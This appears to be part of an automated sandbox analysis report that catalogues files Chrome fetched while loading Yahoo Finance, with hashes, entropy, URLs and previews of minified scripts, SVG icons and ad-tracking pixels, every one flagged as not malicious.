                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-autocomplete",[],t):"object"==typeof exports?exports["wafer-autocomplete"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-autocomplete"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(i){if(a[i])return a[i].exports;var n=a[i]={i:i,l:!1,exports:{}};return e[i].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var i=window.webpackJsonpwafer_wafers_wafer_autocomplete;window.webpackJsonpwafer_wafers_wafer_autocomplete=function(t,a,r){for(var o,s,l=0,u=[];l<t.length;l++)s=t[l],n[s]&&u.push(n[s][0]),n[s]=0;for(o in a)Object.prototype.hasOwnProperty.call(a,o)&&(e[o]=a[o]);for(i&&i(t,a,r);u.length;)u.shift()()};var a={},n={1:0,2:0};return t.e=function(e){function i(){s.onerror=s.onload=null,clearTimeout(l);var t=n[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),n[e]=void 0)}var a=n[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.106668500556004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHjVYuIfepp5bZIAdSbFS:H69mc4sl3O4jVJCepvNb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AE5FFB8B9F718200BEECE321B27C2494
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DF8746A5480120C715B1049C742DA6C7E1A7EEA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:78D7CC5AC35882275B042C947BFFCF418BE0D5AA717E450C1DED37AE5E2B6DBF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A1ABD5E5FB5C6FD40E50F390D28B67DF3A1F284A8174436D8B7A13158FD35122EE0D8272867C1C288C54FC67B78B60D91EB334CA0D34F61B3A586B218F540AAA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M16.59 8.59 12 13.17 7.41 8.59 6 10l6 6 6-6z"/></svg>';export{s as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8638)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11422
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.613747513694845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:RSHjC5hviIfEVq99u/8FzL0XnxeLyu4VG7cCFDZ5gBRsqn7N5w9sH/2LQg6m54cq:RSHjghviIf4OL0XnxKyu4VMdtDcxn7Nz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:821961263364FD2871A65819CAAFCFB2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:927B89CE554715A642D5342C54AEE00953155337
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B7DD6781F3DB030CD0F0FCAF4F881BB484D35273116473623C20D6C6EF940DE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2BB680B16E2363B4ADB118964F889551B16C9D150B9C8AD9C08482835F051FB6DE6F468EB141D61015F30783098169CFBF481ED4C162619FF8CF6B5DA74CC516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{F as h}from"./commonUtil.CI22_Irn.js";const S=`<svg xmlns="http://www.w3.org/2000/svg" viewBox="5 0 20 24" width="1rem" height="1rem">. <path fill-rule="evenodd" d="M17 8V6c0-2.76-2.24-5-5-5S7 3.24 7 6v4h.2c-1.12 0-1.68 0-2.108.218a2 2 0 0 0-.874.874C4 11.52 4 12.08 4 13.2v5.6c0 1.12 0 1.68.218 2.108a2 2 0 0 0 .874.874C5.52 22 6.08 22 7.2 22h9.6c1.12 0 1.68 0 2.108-.218a2 2 0 0 0 .874-.874C20 20.48 20 19.92 20 18.8v-5.6c0-1.12 0-1.68-.218-2.108a2 2 0 0 0-.874-.874C18.48 10 17.92 10 16.8 10h.2zm-1.9 2H8.9V6c0-1.71 1.39-3.1 3.1-3.1s3.1 1.39 3.1 3.1z" clip-rule="evenodd"></path>.</svg>`,_="https://checkout.finance.yahoo.com",L={"community-insights":"https://s.yimg.com/cv/apiv2/default/finance/subscriptions/communityInsightsUpsell.png","fair-value":"https://s.yimg.com/cv/apiv2/finance/subscription/fair-value-source.png","insider-sentiment":"https://s.yimg.com/cv/apiv2/finance/subscription/insider-sentiment-source.png",dividends:"https://s.yimg.com/cv/apiv2/finance/subscription/di
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1829
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.990791462240958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:2dVZZL8NdTv3lYAjeaxMcRcTX+TLRjUhZ88TzlSV29nLiFyGAhIhxCAOFTsWwK3p:c7R8NdTvVY6OST8883029nlhcmTNL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D216D3B4E5A67F022FA3EF4E71781439
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5E6B829187DCD592B6C4F4998F513B6B77FC9D18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:54352CC37FAFE590444BC57BE54170A6CCB8A8EEB30A618911995780FAA8462E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5878820FE8632627043FD2FDCBB65F3CB614B06A786DBF719A80165187A804D5D23A74BD8E312073ED292C07DCA4D42A39D346D35D9C0B49362AA036D9E7B413
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/cv/apiv2/finance/favicon_y19_32x32_custom.svg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="32px" height="32px" viewBox="0 0 32 32" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 57.1 (83088) - https://sketch.com -->. <title>favicon_y19_32x32_custom</title>. <desc>Created with Sketch.</desc>. <defs>. <polygon id="path-1" points="0.171073913 0.0931111111 9.4455087 0.0931111111 9.4455087 9.92442222 0.171073913 9.92442222"></polygon>. </defs>. <g id="favicon_y19_32x32_custom" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <rect fill="#6001D2" x="0" y="0" width="32" height="32"></rect>. <g id="y!" transform="translate(5.000000, 6.000000)">. <polygon id="Fill-1" fill="#FFFFFF" points="9.70835927 5 7.04604411 11.4197051 4.40657437 5 0 5 4.91176421 16.0265583 3.14442407 20 7.45914574 20 14 5"></polygon>. <g id="!" transform="translate(12.000000, 0.000000)">. <path d="M2.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://sync-pm.ads.yieldmo.com/sync?pn_id=pub&id=0E953B97-4F55-458F-AF4A-D3EA6DD13C81&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2407), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2407
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.639644891332791
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:CP06MrZUlRp6fNq6Y2Bqt82BqhysGJdTBbjh56ahS5Y6nL6Kq:CGreTUNs2Bqt82BqhysyrbF7S5Rrq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:78E645369FA74D177271FCBDE7E1F247
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA43E6493E0FA70F0312B686F0B4954EE59AD34D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5FC8CFA291905EEA58B11713504278C4AA7509D593F5059EA0502E5C35FB7BD2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5BAA182A425868465E2E408FB2CD78A7972B721EEF653FF4A7287050A9FA03BF019DE271F4E2B3B86186550AC24AAF3CEB5FD7DCFDD231F601E88F08C0CDAEC6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=74319382&p=0&s=0&a=0&ptask=ALL&np=0&fp=0&rp=0&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:PubMatic.loadAsyncImagePixel('https://sync.crwdcntrl.net/qmap?c=240&tp=PUBM&tpid=0E953B97-4F55-458F-AF4A-D3EA6DD13C81&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://cr.frontend.weborama.fr/cr?key=pubmatic&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://mwzeom.zeotap.com/mw?zpartnerid=1384&env=mWeb&gdpr=0&gdpr_consent=&cid=0E953B97-4F55-458F-AF4A-D3EA6DD13C81');PubMatic.loadAsyncImagePixel('https://uipglob.semasio.net/pubmatic/1/info?sType=sync&sExtCookieId=0E953B97-4F55-458F-AF4A-D3EA6DD13C81&sInitiator=external&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://cm.g.doubleclick.net/pixel?google_nid=pmeb&google_sc=1&google_hm=DpU7l09VRY-vStPqbdE8gQ%3D%3D&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://cm.g.doubleclick.net/pixel?google_nid=pubmatic&google_cm&google_sc&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://um.simpli.fi/pubmatic?https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODA2JnRsPTUxO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1283)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):14701
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3348186952316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:wcumCSCsoBvJgeFhvKAIuiKWvVGDSvXX+8uVPcte/:IuoBvJguhvKIiZ6SvXtuVPcte/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5396654C4CEB9F773A4D5853E8F3A101
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D2407F1268403729AAE97ECE5CDABC5C3240F4A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:50D07C739710531D4B32B523DCC33DDF1569C58C681964CFDD52BA97329EF69B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E1C31A64B9BB61FDCF0700CBAD609E8E2AF7111EFA6B157D51D874D7144B909030F0528C743A5CB853A632E0EE99E7AB81A42B35D272C2AD73AA3E311FC1F7B4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var f;function ba(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}}function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var c=0;c<a.length;++c){var b=a[c];if(b&&b.Math==Math)return b}throw Error("Cannot find global object");}var da=ca(this);.function g(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):{next:ba(a)}}var ea="function"==typeof Object.create?Object.create:function(a){function c(){}c.prototype=a;return new c},m;if("function"==typeof Object.setPrototypeOf)m=Object.setPrototypeOf;else{var n;a:{var fa={a:!0},p={};try{p.__proto__=fa;n=p.a;break a}catch(a){}n=!1}m=n?function(a,c){a.__proto__=c;if(a.__proto__!==c)throw new TypeError(a+" is not extensible");return a}:null}.var q=m,r=this||self;functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (5607)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.484930079005549
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:GWn//1QKeh7qfcwdiSoviSeGcfJHhT4wCZnJqbxE1ALW5V1ZVw1eV5J+sIWeCo:7/iElG0BbCZnJMEt5VrVw1eV5JEWeCo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:952D721C9F2527597068A70FF5FF2B39
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2FCA5817EEBC29A12626575E7C25DF7358D88D4B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:16D23EA7136091BC0A4F822FB07506B8A9906E27BF77EF6DBE159AD53580C2EB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E61E0465A99DC3BD2E021FBB084148A3289E7AA920729236456A19971C3875C29793879E46612CCE027BC7C5E5AC329AC1B9665ACF8605198A2A44CA8DDC8727
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/EnhancedPill.BaO1Iq-c.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as K,a0 as Y,e as O,t as M,b as A,d as w,f as C,h as R,i as b,j as B,q as I,k as U,l as h,m as Z,o as x,n as F}from"./scheduler.Dr9AAxFe.js";import{S as Q,i as W,c as V,b as j,m as q,g as ee,a as k,e as te,t as N,d as H}from"./index.DCSmZEjO.js";import{e as oe,j as ne,d as le,t as v,_ as z,g as se,h as re,aj as ie}from"./commonUtil.CI22_Irn.js";import{B as G}from"./Button.DpT5MMuf.js";import ae from"./ErrorMsg.DF_ReW41.js";import{S as fe}from"./Spinner.CydnjLPC.js";import{l as J,f as ce}from"./logUtil.hOue7iAU.js";import{l as ue,u as de}from"./updatePortfolioChartStore.De0LOpBM.js";import{l as me}from"./loadPortfolios.CToUELqx.js";import"./PortfolioSymbolCount.svelte_svelte_type_style_lang.EL5Zj2tO.js";async function _e(n,e){var m,p;const o=await oe(n);if(!ne(o)||!((m=o.user)!=null&&m.guid))return null;const{pfId:t,setLoading:s=!1}=e;if(!t){const u=new Error("Bad request for deletePortfolio, missing pfId");return J(n,{pfId:t},{data:u,perfLabel:"deletePortfolio"}),Promise.rejec
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2733)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2734
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.318999874087255
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:wyeg4Nyx04/klhQUXouFGsQt3Go7hTilGoYmhwK1M6HnsSpH48XUQ+5Cz:wRJ4MlhQUX1cX3Go7hGlGoHwoMAsSpHr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7CE9B8FF10E69A4F9AD55C30A3E4309B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E927951AE63B69588FFD72558304120EB101A83B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:24E899DBD001B954F8EE2105EEBF1A00D60EE9FCE37DB7E61099DB047B1F97B7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3339DA4812F4011129B0766835C2B71737A1D20F82A07965CF7255B814B658884D2EA9549F359F5E8CE8ECE17FF627899A2D36141282CC0AE4039064DE78C615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Lazy.DM9NzWSl.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as j,p as d,k as u,i as f,y as w,c as A,b as G,j as B,u as H,g as J,a as M,e as S,d as N,f as D,q as I,n as L,F as O,G as P,v as Q}from"./scheduler.Dr9AAxFe.js";import{S as R,i as T,t as m,g as U,a as k,e as W}from"./index.DCSmZEjO.js";import{g as X,h as Y}from"./commonUtil.CI22_Irn.js";import{i as Z}from"./intersectUtil.DVqOQxux.js";import{a as x}from"./43.CtYdpA_T.js";import{g as $,r as v}from"./headerUtil.D8XWvN0j.js";const ee=r=>({loading:r&1,Component:r&32,value:r&16,hasError:r&8}),z=r=>({loading:r[0],Component:r[5],value:r[4],hasError:r[3]});function C(r){let t,i,e=r[0]&&E(r);const l=r[10].default,s=A(l,r,r[9],z);return{c(){e&&e.c(),t=G(),s&&s.c()},l(o){e&&e.l(o),t=B(o),s&&s.l(o)},m(o,n){e&&e.m(o,n),u(o,t,n),s&&s.m(o,n),i=!0},p(o,n){o[0]?e?e.p(o,n):(e=E(o),e.c(),e.m(t.parentNode,t)):e&&(e.d(1),e=null),s&&s.p&&(!i||n&569)&&H(s,l,o,o[9],i?M(l,o[9],n,ee):J(o[9]),z)},i(o){i||(m(s,o),i=!0)},o(o){k(s,o),i=!1},d(o){o&&f(t),e&&e.d(o),s&&s.d(o)}}}function E(r){let t;function i(s,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (7500)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3770861437837905
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:yzK5Xzzy8qhWuwRMExuA0C0Mpzzy8qktuwRMEq090fxzsOZE4fynvMDn70KHngiw:D5jeHhWxME4A0C0M9eHktxMEq090fxzw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D3A7C2A0DF64BAB125872521728E4C82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2789EE1DEF5CB8A3AC62060811F1A959F5F2B999
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1150AAAE0DA7578D07172B5A6F4D6E4A8A39C85E5B32EEE0E601B36A16B5EF50
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:42302F610A546FB985240ADA3B9F31216359D343817CEA320AC668CF4BF0E1ADB4ADE78B1915C901E662F6EAC3BC6F86D969F4891D9B9D0440172FA67FC4B038
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as K,e as S,b as P,p as I,d as w,f as H,j as U,i as d,q as v,_ as E,U as k,k as p,l as J,a4 as Q,c as j,u as V,g as C,a as N,t as q,h as R,m as X}from"./scheduler.Dr9AAxFe.js";import{S as Y,i as Z,g as A,a as g,e as D,t as h,c as y,b as $,m as x,d as ee}from"./index.DCSmZEjO.js";import{V as le}from"./ViewMoreLink.ZEdK_9F5.js";import{t as ie}from"./commonUtil.CI22_Irn.js";const se=f=>({}),W=f=>({}),ne=f=>({}),B=f=>({});function te(f){let e,l;const i=f[14].default,s=j(i,f,f[15],null),n=s||ae();return{c(){e=S("h2"),n&&n.c(),this.h()},l(t){e=w(t,"H2",{class:!0});var o=H(e);n&&n.l(o),o.forEach(d),this.h()},h(){v(e,"class","header yf-13lpgjv"),k(e,"ellipsis",f[10])},m(t,o){p(t,e,o),n&&n.m(e,null),l=!0},p(t,o){s&&s.p&&(!l||o&32768)&&V(s,i,t,t[15],l?N(i,t[15],o,null):C(t[15]),null),(!l||o&1024)&&k(e,"ellipsis",t[10])},i(t){l||(h(n,t),l=!0)},o(t){g(n,t),l=!1},d(t){t&&d(e),n&&n.d(t)}}}function fe(f){let e,l,i;const s=f[14].default,n=j(s,f,f[15],null),t=n||re();return{c(){e=S("h3"),t&&t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1030)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1031
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.239216717577353
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:kIbcMnLZdnRRBaWR3RAtIs6QDya3LttNabQ3vzLV5OisyTwDJ5:kUjVdnRRBaWhkT3xObQXVQ7UwDJ5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D33DA22382528DB6C0E1A8097793F52A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FB991F77BDFE283D86A754F72386958DD4E4E505
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4CD006C2A1260ED66661C791737352F7E903F928AC56CB21BB98A09A03E7F986
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2832FF5E47748F0FAC0EC0677D5F5A316A6C684C326E4B44A85E4D5E2B647E053279E89B1A1CA2AF4C21762DBFDE988DAA1EBC84C451FAF8832705B2DE9BEFBA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{d as T,e as k}from"./commonUtil.CI22_Irn.js";import{f as m,l as h}from"./logUtil.hOue7iAU.js";async function w(i,{count:a=25,silent:n=!1,quoteType:o="ALL",force:t=!1,critical:l=!1,fields:u=[]}){var f,d;const[e]=await T(["trendingTickers"],i),g=await k(i);if(e.getTrendingTickers().length>=a&&!t)return e.getTrendingTickers();try{const r=await m(i,{pathname:`/v1/finance/trending/${(g==null?void 0:g.region)||"US"}`,perfLabel:"loadTrendingTickers",query:{count:typeof a=="number"?String(a):a,fields:["logoUrl","longName","shortName","regularMarketChange","regularMarketChangePercent","regularMarketPrice",...u].join(","),format:"true",useQuotes:"true",quoteType:o}}),{result:s,error:c}=(r==null?void 0:r.finance)||{};return c||!s?(e.setError(c),null):(n||e.updateTrendingTickers((f=s[0])==null?void 0:f.quotes),n||t?(d=s[0])==null?void 0:d.quotes:e.getTrendingTickers())}catch(r){if(h(i,{count:a,silent:n,force:t,quoteType:o},{data:r,perfLabel:"loadTrendingTickers",isCritical:l}),n||e.setError
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (4241)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4242
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2664268183067335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:BmpnyiT+3LHVCkABb2L73JAr8XTPzZFatL6fj9mq5Wp:BmpyiT+71Lm2pxXDzZA65mx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7409B1E4F1C331EEA2D20E239AD2AFE9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A4EB8DA9AECB68715DCCD1774B247C08E4799E5E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7C38AF355ADD4D678EDB3C9A171A4302F351D68F3FECD790760D583FEF0C79E5
